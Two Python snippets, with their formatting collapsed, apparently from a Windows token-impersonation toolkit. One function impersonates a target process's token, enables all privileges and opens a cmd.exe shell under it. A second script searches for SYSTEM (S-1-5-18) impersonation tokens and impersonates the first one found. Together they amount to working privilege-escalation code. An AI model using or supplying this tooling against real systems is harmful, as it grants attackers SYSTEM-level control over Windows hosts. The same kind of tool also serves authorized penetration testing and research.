def imptoken(args): if args['pid'] == None: logging.error("A pid has to be selected") else: if args['ihandle'] == None: printT("Impersonating primary token of pid {0}".format( args['pid'])) else: printT("Impersonating token of the thread ihandle {0} of pid {1}". format(args['ihandle'], args['pid'])) imp = Impersonate() imp.enableAllUserRights() status = imp.impersonateThisToken(pid=args['pid'], iHandle=args['ihandle']) if status == True: printT("Trying to open a cmd shell...") printT( "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell" ) imp.printCurrentThreadEffectiveToken() imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to impersonate")
import sys sys.path.append('../') from impersonate import Impersonate from utils import * from windef import TokenImpersonation configureLogging() imp = Impersonate() #Get all 'impersonation' tokens wich can be impersonated and which are 'system' allTokens = imp.getTokensAccessibleFilter(targetPID=None, filter={ 'canimpersonate': True, 'sid': 'S-1-5-18', 'type': TokenImpersonation }, _useThreadMethod=False) if allTokens == {} or allTokens == None: print("No one token found for impersonation") else: #use the first token of the first pid returned in 'allTokens' pid = list(allTokens.keys())[0] firstIHandle = allTokens[pid][0]['ihandle'] imp.printThisToken(allTokens, pid, firstIHandle) imp.impersonateThisToken(pid=pid, iHandle=firstIHandle) print("Current Effective token for current thread after impersonation:") imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False) imp.terminateImpersonation() print( "Current Effective token for current thread (impersonation finished):") imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)